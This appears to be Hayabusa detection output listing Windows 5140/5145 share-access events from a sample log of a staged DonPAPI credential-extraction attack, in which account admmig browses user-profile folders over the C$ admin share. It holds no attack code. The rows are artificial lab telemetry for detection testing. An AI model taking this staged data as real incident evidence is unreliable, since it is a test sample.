2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.736 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
